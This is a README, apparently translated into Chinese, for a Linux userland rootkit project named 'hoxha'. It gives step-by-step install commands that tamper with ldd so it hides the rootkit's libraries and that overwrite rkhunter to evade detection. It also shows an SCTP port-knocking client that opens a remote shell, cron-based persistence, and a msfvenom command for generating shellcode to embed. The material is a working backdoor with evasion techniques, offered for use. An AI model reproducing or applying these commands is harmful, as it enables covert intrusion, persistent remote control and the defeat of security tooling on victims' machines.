mephistolist/hoxha

# hoxha 一个针对 x86_64 Linux 的用户态 rootkit，旨在成为 Tito 所未能成为的一切。正如恩维尔·霍查（Enver Hoxha）是铁托（Tito）的隔壁邻居且在意识形态上完全对立一样，没有比这更合适的名称了。霍查也以极度偏执而闻名，因此这里使用了更多的检测规避技术。

你需要安装一个依赖项才能构建此代码： ``` sudo apt install libreadline-dev ``` 然后你可以像这样下载此项目： ``` git clone https://github.com/mephistolist/hoxha.git ``` 如果你使用的不是基于 Debian 的系统，你需要运行以下命令以将其更改为你系统的 python 可执行文件名称： ``` sed -i 's/python3/python/g' hoxha/persistance/libexec.c; sed -i 's/python3/python/g' hoxha/persistance/libhide.c ``` 考虑到 SCTP 已安装并加载到内核中，你可以像这样安装此 rootkit： ``` cd hoxha && sudo make install clean && cd persistance && [ -f ./patchelf ] && chmod +x ./patchelf && sudo make install clean && sudo sed -i 's/try_trace \"$RTLD\" \"$file\" || result=1/try_trace \"$RTLD\" \"$file\" | grep -vE \"libc.so.4|libc.so.5\" || result=1/g' /usr/bin/ldd && [ -f $(which rkhunter) ] && sudo cp ./rkhunter $(which rkhunter) 2>/dev/null; ``` 只需提供安装了此 rootkit 的目标 IP 地址，即可使用客户端： ``` # ./enver 127.0.0.1 [+] SCTP knock sequence sent. [*] Connecting to SCTP shell at 127.0.0.1:5000... [+] Connected. Type commands (type 'exit' to quit): sctp-shell> ``` 由于 SCTP 端口很难关闭，我建议将其更新为你存放 'hoxha' 文件夹的路径，并在退出 shell 时运行此命令： ``` /home/user/hoxha/persistance/patchelf --remove-needed /lib/x86_64-linux-gnu/libc.so.5 $(which killall) && killall -9 hoxha && systemctl restart cron && /home/user/hoxha/persistance/patchelf --add-needed /lib/x86_64-linux-gnu/libc.so.5 $(which killall) ``` 这将确保只留下一个端口用于监听未来的连接。 如果你想编辑或仅从源码构建该 shell，只需在根目录下输入 'make' 即可。使用 'make install' 将在 /usr/bin/hoxha 处生成一个二进制文件。然后你可以结合 msfvenom 运行它： ``` msfvenom -p linux/x64/exec CMD=/usr/bin/hoxha -f raw -o shellcode.bin -b "\x00\x0a\x0d" ``` 然后你可以像这样对原始数据进行 base64 编码： ``` cat shellcode.bin | base64 ``` 将该 base64 编码的字符串添加到 hoxha/persistance/libexec.c 文件中，并重新运行 persistance 文件夹中的 Makefile 以应用你的更改。 目前已在运行 cron 并位于 $PATH 中的 Debian Trixie 上进行了测试。其他发行版和配置可能可以运行，也可能需要手动干预。 *此项目现已被 Mao 取代。

标签：evasion, patchelf, Rootkit, SCTP协议, x86_64, Zeek, 动态链接库劫持, 后门, 嗅探欺骗, 安全测试, 恶意软件, 攻击性安全, 攻击路径可视化, 权限维持, 用户态, 远控, 逆向工具, 隐蔽通信, 黑客工具